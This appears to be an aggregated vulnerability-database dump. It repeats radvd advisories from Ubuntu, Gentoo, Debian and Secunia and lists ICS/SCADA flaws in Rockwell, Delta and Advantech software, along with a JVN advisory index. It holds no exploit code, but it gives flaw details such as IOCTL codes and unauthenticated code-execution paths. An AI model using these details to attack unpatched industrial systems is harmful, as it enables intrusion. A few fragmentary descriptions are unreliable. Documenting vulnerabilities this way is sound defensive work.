========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at: http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at: http://www.cisco.com/go/psirt +-------------------------------------------------------------------- Copyright 2010-2011 Cisco Systems, Inc. All rights reserved. +-------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (SunOS) iFcDBQFOb9w/QXnnBKKRMNARCBomAP9pCiRwCB8z3oe3IWB2XXNzeaQxAwoq0gQ4 6znwu3lLSAD/Y6o+u8AofSMxkj3THWIdpbjVXKQXMal/BhxDhN5fsI8= =Ybok -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
var-201908-0863 Rockwell Automation Arena Simulation Software versions 16.00.00 and earlier contain a USE AFTER FREE CWE-416. A maliciously crafted Arena file opened by an unsuspecting user may result in the application crashing or the execution of arbitrary code. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of DOE files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. 9502-Ax) 16.00.00 and earlier versions have resource management error vulnerabilities
var-201402-0027 The process_ra function in the router advertisement daemon (radvd) before 1.8.2 allows remote attackers to cause a denial of service (stack-based buffer over-read and crash) via unspecified vectors. radvd is prone to the follow security vulnerabilities: 1. Multiple local privilege-escalation vulnerability. 2. A local arbitrary file-overwrite vulnerability. 3. Multiple remote denial-of-service vulnerabilities. An attacker can exploit these issues to execute arbitrary code with administrative privileges, overwrite arbitrary files, and cause denial-of-service conditions. The software can replace IPv6 routing for stateless address auto-configuration. A security vulnerability exists in the 'process_ra' function in radvd 1.8.1 and earlier. ========================================================================== Ubuntu Security Notice USN-1257-1 November 10, 2011 radvd vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 11.10 - Ubuntu 11.04 - Ubuntu 10.10 - Ubuntu 10.04 LTS Summary: radvd could be made to crash or overwrite certain files if it received specially crafted network traffic. Software Description: - radvd: Router Advertisement Daemon Details: Vasiliy Kulikov discovered that radvd incorrectly parsed the ND_OPT_DNSSL_INFORMATION option. The default compiler options for affected releases should reduce the vulnerability to a denial of service. This issue only affected Ubuntu 11.04 and 11.10. (CVE-2011-3601) Vasiliy Kulikov discovered that radvd incorrectly filtered interface names when creating certain files. (CVE-2011-3602) Vasiliy Kulikov discovered that radvd incorrectly handled certain lengths. (CVE-2011-3604) Vasiliy Kulikov discovered that radvd incorrectly handled delays when used in unicast mode, which is not the default in Ubuntu. If used in unicast mode, a remote attacker could cause radvd outages, resulting in a denial of service. (CVE-2011-3605) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 11.10: radvd 1:1.8-1ubuntu0.1 Ubuntu 11.04: radvd 1:1.7-1ubuntu0.1 Ubuntu 10.10: radvd 1:1.6-1ubuntu0.1 Ubuntu 10.04 LTS: radvd 1:1.3-1.1ubuntu0.1 In general, a standard system update will make all the necessary changes. References: http://www.ubuntu.com/usn/usn-1257-1 CVE-2011-3601, CVE-2011-3602, CVE-2011-3604, CVE-2011-3605 Package Information: https://launchpad.net/ubuntu/+source/radvd/1:1.8-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.7-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.6-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.3-1.1ubuntu0.1 . ---------------------------------------------------------------------- Secunia is hiring! Find your next job here: http://secunia.com/company/jobs/ ---------------------------------------------------------------------- TITLE: Gentoo update for radvd SECUNIA ADVISORY ID: SA46930 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46930/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 RELEASE DATE: 2011-11-21 DISCUSS ADVISORY: http://secunia.com/advisories/46930/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/46930/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Gentoo has issued an update for radvd. For more information: SA46200 SOLUTION: Update to "net-misc/radvd-1.8.2" or later. ORIGINAL ADVISORY: GLSA 201111-08: http://www.gentoo.org/security/en/glsa/glsa-201111-08.xml OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: radvd: Multiple vulnerabilities Date: November 20, 2011 Bugs: #385967 ID: 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in radvd which could potentially lead to privilege escalation, data loss, or a Denial of Service. Background ========== radvd is an IPv6 router advertisement daemon for Linux and BSD. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/radvd < 1.8.2 >= 1.8.2 Description =========== Multiple vulnerabilities have been discovered in radvd. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All radvd users should upgrade to the latest stable version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/radvd-1.8.2" References ========== [ 1 ] CVE-2011-3601 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3601 [ 2 ] CVE-2011-3602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3602 [ 3 ] CVE-2011-3603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3603 [ 4 ] CVE-2011-3604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3604 [ 5 ] CVE-2011-3605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3605 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201111-08.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2011 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2323-1 security@debian.org http://www.debian.org/security/ Yves-Alexis Perez October 26, 2011 http://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : radvd Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2011-3602 CVE-2011-3604 CVE-2011-3605 Debian Bug : 644614 Multiple security issues were discovered by Vasiliy Kulikov in radvd, an IPv6 Router Advertisement daemon: CVE-2011-3602 set_interface_var() function doesn't check the interface name, which is chosen by an unprivileged user. CVE-2011-3604 process_ra() function lacks multiple buffer length checks which could lead to memory reads outside the stack, causing a crash of the daemon. CVE-2011-3605 process_rs() function calls mdelay() (a function to wait for a defined time) unconditionnally when running in unicast-only mode. As this call is in the main thread, that means all request processing is delayed (for a time up to MAX_RA_DELAY_TIME, 500 ms by default). Note: upstream and Debian default is to use anycast mode. For the oldstable distribution (lenny), this problem has been fixed in version 1:1.1-3.1. For the stable distribution (squeeze), this problem has been fixed in version 1:1.6-1.1. For the testing distribution (wheezy), this problem has been fixed in version 1:1.8-1.2. For the unstable distribution (sid), this problem has been fixed in version 1:1.8-1.2. We recommend that you upgrade your radvd packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk6q2QcACgkQXm3vHE4uylqlEQCgpdFwHzpKLF6KHlJs4y/ykeo/ oEYAniJXFaff25pMtXzM6Ovu8zslZm7H =VfHu -----END PGP SIGNATURE-----
var-201402-0028 The process_rs function in the router advertisement daemon (radvd) before 1.8.2, when UnicastOnly is enabled, allows remote attackers to cause a denial of service (temporary service hang) via a large number of ND_ROUTER_SOLICIT requests. radvd is prone to the follow security vulnerabilities: 1. Multiple local privilege-escalation vulnerability. 2. A local arbitrary file-overwrite vulnerability. 3. Multiple remote denial-of-service vulnerabilities. An attacker can exploit these issues to execute arbitrary code with administrative privileges, overwrite arbitrary files, and cause denial-of-service conditions. The software can replace IPv6 routing for stateless address auto-configuration. An input validation vulnerability exists in the 'process_rs' function in radvd 1.8.1 and earlier. ========================================================================== Ubuntu Security Notice USN-1257-1 November 10, 2011 radvd vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 11.10 - Ubuntu 11.04 - Ubuntu 10.10 - Ubuntu 10.04 LTS Summary: radvd could be made to crash or overwrite certain files if it received specially crafted network traffic. Software Description: - radvd: Router Advertisement Daemon Details: Vasiliy Kulikov discovered that radvd incorrectly parsed the ND_OPT_DNSSL_INFORMATION option. The default compiler options for affected releases should reduce the vulnerability to a denial of service. This issue only affected Ubuntu 11.04 and 11.10. (CVE-2011-3601) Vasiliy Kulikov discovered that radvd incorrectly filtered interface names when creating certain files. (CVE-2011-3602) Vasiliy Kulikov discovered that radvd incorrectly handled certain lengths. (CVE-2011-3604) Vasiliy Kulikov discovered that radvd incorrectly handled delays when used in unicast mode, which is not the default in Ubuntu. (CVE-2011-3605) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 11.10: radvd 1:1.8-1ubuntu0.1 Ubuntu 11.04: radvd 1:1.7-1ubuntu0.1 Ubuntu 10.10: radvd 1:1.6-1ubuntu0.1 Ubuntu 10.04 LTS: radvd 1:1.3-1.1ubuntu0.1 In general, a standard system update will make all the necessary changes. References: http://www.ubuntu.com/usn/usn-1257-1 CVE-2011-3601, CVE-2011-3602, CVE-2011-3604, CVE-2011-3605 Package Information: https://launchpad.net/ubuntu/+source/radvd/1:1.8-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.7-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.6-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.3-1.1ubuntu0.1 . ---------------------------------------------------------------------- Secunia is hiring! Find your next job here: http://secunia.com/company/jobs/ ---------------------------------------------------------------------- TITLE: Gentoo update for radvd SECUNIA ADVISORY ID: SA46930 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46930/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 RELEASE DATE: 2011-11-21 DISCUSS ADVISORY: http://secunia.com/advisories/46930/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/46930/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Gentoo has issued an update for radvd. For more information: SA46200 SOLUTION: Update to "net-misc/radvd-1.8.2" or later. ORIGINAL ADVISORY: GLSA 201111-08: http://www.gentoo.org/security/en/glsa/glsa-201111-08.xml OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: radvd: Multiple vulnerabilities Date: November 20, 2011 Bugs: #385967 ID: 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in radvd which could potentially lead to privilege escalation, data loss, or a Denial of Service. Background ========== radvd is an IPv6 router advertisement daemon for Linux and BSD. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/radvd < 1.8.2 >= 1.8.2 Description =========== Multiple vulnerabilities have been discovered in radvd. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All radvd users should upgrade to the latest stable version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/radvd-1.8.2" References ========== [ 1 ] CVE-2011-3601 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3601 [ 2 ] CVE-2011-3602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3602 [ 3 ] CVE-2011-3603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3603 [ 4 ] CVE-2011-3604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3604 [ 5 ] CVE-2011-3605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3605 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201111-08.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2011 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2323-1 security@debian.org http://www.debian.org/security/ Yves-Alexis Perez October 26, 2011 http://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : radvd Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2011-3602 CVE-2011-3604 CVE-2011-3605 Debian Bug : 644614 Multiple security issues were discovered by Vasiliy Kulikov in radvd, an IPv6 Router Advertisement daemon: CVE-2011-3602 set_interface_var() function doesn't check the interface name, which is chosen by an unprivileged user. CVE-2011-3604 process_ra() function lacks multiple buffer length checks which could lead to memory reads outside the stack, causing a crash of the daemon. CVE-2011-3605 process_rs() function calls mdelay() (a function to wait for a defined time) unconditionnally when running in unicast-only mode. As this call is in the main thread, that means all request processing is delayed (for a time up to MAX_RA_DELAY_TIME, 500 ms by default). Note: upstream and Debian default is to use anycast mode. For the oldstable distribution (lenny), this problem has been fixed in version 1:1.1-3.1. For the stable distribution (squeeze), this problem has been fixed in version 1:1.6-1.1. For the testing distribution (wheezy), this problem has been fixed in version 1:1.8-1.2. For the unstable distribution (sid), this problem has been fixed in version 1:1.8-1.2. We recommend that you upgrade your radvd packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk6q2QcACgkQXm3vHE4uylqlEQCgpdFwHzpKLF6KHlJs4y/ykeo/ oEYAniJXFaff25pMtXzM6Ovu8zslZm7H =VfHu -----END PGP SIGNATURE-----
var-201402-0026 Buffer overflow in the process_ra function in the router advertisement daemon (radvd) before 1.8.2 allows remote attackers to execute arbitrary code or cause a denial of service (crash) via a negative value in a label_len value. radvd is prone to the follow security vulnerabilities: 1. Multiple local privilege-escalation vulnerability. 2. A local arbitrary file-overwrite vulnerability. 3. Multiple remote denial-of-service vulnerabilities. An attacker can exploit these issues to execute arbitrary code with administrative privileges, overwrite arbitrary files, and cause denial-of-service conditions. The software can replace IPv6 routing for stateless address auto-configuration. A buffer overflow vulnerability exists in the 'process_ra' function in radvd 1.8.1 and earlier. ========================================================================== Ubuntu Security Notice USN-1257-1 November 10, 2011 radvd vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 11.10 - Ubuntu 11.04 - Ubuntu 10.10 - Ubuntu 10.04 LTS Summary: radvd could be made to crash or overwrite certain files if it received specially crafted network traffic. Software Description: - radvd: Router Advertisement Daemon Details: Vasiliy Kulikov discovered that radvd incorrectly parsed the ND_OPT_DNSSL_INFORMATION option. The default compiler options for affected releases should reduce the vulnerability to a denial of service. This issue only affected Ubuntu 11.04 and 11.10. (CVE-2011-3601) Vasiliy Kulikov discovered that radvd incorrectly filtered interface names when creating certain files. (CVE-2011-3602) Vasiliy Kulikov discovered that radvd incorrectly handled certain lengths. (CVE-2011-3604) Vasiliy Kulikov discovered that radvd incorrectly handled delays when used in unicast mode, which is not the default in Ubuntu. If used in unicast mode, a remote attacker could cause radvd outages, resulting in a denial of service. (CVE-2011-3605) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 11.10: radvd 1:1.8-1ubuntu0.1 Ubuntu 11.04: radvd 1:1.7-1ubuntu0.1 Ubuntu 10.10: radvd 1:1.6-1ubuntu0.1 Ubuntu 10.04 LTS: radvd 1:1.3-1.1ubuntu0.1 In general, a standard system update will make all the necessary changes. References: http://www.ubuntu.com/usn/usn-1257-1 CVE-2011-3601, CVE-2011-3602, CVE-2011-3604, CVE-2011-3605 Package Information: https://launchpad.net/ubuntu/+source/radvd/1:1.8-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.7-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.6-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.3-1.1ubuntu0.1 . ---------------------------------------------------------------------- Secunia is hiring! Find your next job here: http://secunia.com/company/jobs/ ---------------------------------------------------------------------- TITLE: Gentoo update for radvd SECUNIA ADVISORY ID: SA46930 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46930/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 RELEASE DATE: 2011-11-21 DISCUSS ADVISORY: http://secunia.com/advisories/46930/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/46930/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Gentoo has issued an update for radvd. For more information: SA46200 SOLUTION: Update to "net-misc/radvd-1.8.2" or later. ORIGINAL ADVISORY: GLSA 201111-08: http://www.gentoo.org/security/en/glsa/glsa-201111-08.xml OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: radvd: Multiple vulnerabilities Date: November 20, 2011 Bugs: #385967 ID: 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in radvd which could potentially lead to privilege escalation, data loss, or a Denial of Service. Background ========== radvd is an IPv6 router advertisement daemon for Linux and BSD. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/radvd < 1.8.2 >= 1.8.2 Description =========== Multiple vulnerabilities have been discovered in radvd. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All radvd users should upgrade to the latest stable version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/radvd-1.8.2" References ========== [ 1 ] CVE-2011-3601 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3601 [ 2 ] CVE-2011-3602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3602 [ 3 ] CVE-2011-3603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3603 [ 4 ] CVE-2011-3604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3604 [ 5 ] CVE-2011-3605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3605 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201111-08.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2011 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5
var-201803-1810 A Stack-based Buffer Overflow issue was discovered in Delta Electronics Delta Industrial Automation DOPSoft, Version 4.00.01 or prior. Stack-based buffer overflow vulnerabilities caused by processing specially crafted .dop or .dpb files may allow an attacker to remotely execute arbitrary code. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation DOPSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of the BackgroundMacro structure in a DPA file. An attacker can leverage this vulnerability to execute code under the context of the current process
var-201810-0396 Advantech WebAccess 8.3.1 and earlier has several stack-based buffer overflow vulnerabilities that have been identified, which may allow an attacker to execute arbitrary code. Authentication is not required to exploit this vulnerability.The specific flaw exists within bwclient.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech (Advantech) WebAccess software is the core of Advantech's IoT application platform solution, providing users with a user interface based on HTML5 technology to achieve cross-platform and cross-browser data access experience. A stack buffer overflow vulnerability exists in Advantech WebAccess. Advantech WebAccess is prone to the following security vulnerabilities: 1. A directory-traversal vulnerability 3. An arbitrary-file-deletion vulnerability 4. This may aid in further attacks. Advantech WebAccess 8.3.1 and prior versions are vulnerable
var-201906-1029 In WebAccess/SCADA Versions 8.3.5 and prior, multiple untrusted pointer dereference vulnerabilities may allow a remote attacker to execute arbitrary code. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x2776 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess/SCADA is a browser-based SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment
var-201702-0423 An issue was discovered in Delta Electronics WPLSoft, Versions prior to V2.42.11, ISPSoft, Versions prior to 3.02.11, and PMSoft, Versions prior to2.10.10. There are multiple instances of heap-based buffer overflows that may allow malicious files to cause the execution of arbitrary code or a denial of service. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation ISPSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of dvp files. The process does not properly validate the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of current process. Delta Electronics WPLSoft and others are software control platforms used by Delta Electronics to edit the Delta DVP series of programmable logic controllers (PLCs). A heap buffer overflow vulnerability exists in several Delta Electronics products
var-201801-0151 A Stack-based Buffer Overflow issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple instances of a vulnerability that allows too much data to be written to a location on the stack. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the parsing of the command line in the bwmail utility. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple denial-of-service vulnerabilities 2. Multiple stack-based buffer-overflow vulnerabilities 3. A directory-traversal vulnerability 4. An SQL-injection vulnerability 5. Failed attacks will cause denial of service conditions. versions prior to Advantech WebAccess 8.3 are vulnerable
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
jvndb-2025-014642 Multiple vulnerabilities in Canon Printer Drivers for Production Printers, Office/Small Office Multifunction Printers and Laser Printers 2025-09-30T11:50+09:00 2025-09-30T11:50+09:00
jvndb-2025-000081 DataSpider Servista improper restriction of XML external entity references 2025-09-29T14:44+09:00 2025-09-29T14:44+09:00
jvndb-2025-000066 Improper file access permission settings in multiple i-FILTER products 2025-08-27T19:50+09:00 2025-09-29T13:45+09:00
jvndb-2025-000077 RICOH Streamline NX vulnerable to tampering with operation history 2025-09-08T13:42+09:00 2025-09-24T16:53+09:00
jvndb-2025-007519 Multiple vulnerabilities in multiple BROTHER products 2025-06-26T18:15+09:00 2025-09-22T10:16+09:00
jvndb-2025-014105 OMRON SOCIAL SOLUTIONS Uninterruptible Power Supply (UPS) management application registers a Windows service with an unquoted file path 2025-09-19T16:21+09:00 2025-09-19T16:21+09:00
jvndb-2025-014104 Multiple vulnerabilities in I-O DATA wireless LAN routers 2025-09-19T14:58+09:00 2025-09-19T14:58+09:00
jvndb-2025-014081 Multiple Brother and its OEM products with weak initial administrator passwords 2025-09-19T10:52+09:00 2025-09-19T10:52+09:00
jvndb-2025-000079 UNIVERGE IX/IX-R/IX-V series routers provided by NEC Corporation vulnerable to cross-site scripting 2025-09-18T17:43+09:00 2025-09-18T17:43+09:00
jvndb-2025-000078 Century HW RAID Manager registers a Windows service with an unquoted file path 2025-09-17T13:45+09:00 2025-09-17T13:45+09:00
jvndb-2025-000048 WTW-EAGLE App vulnerable to improper server certificate validation 2025-09-12T13:57+09:00 2025-09-12T13:57+09:00
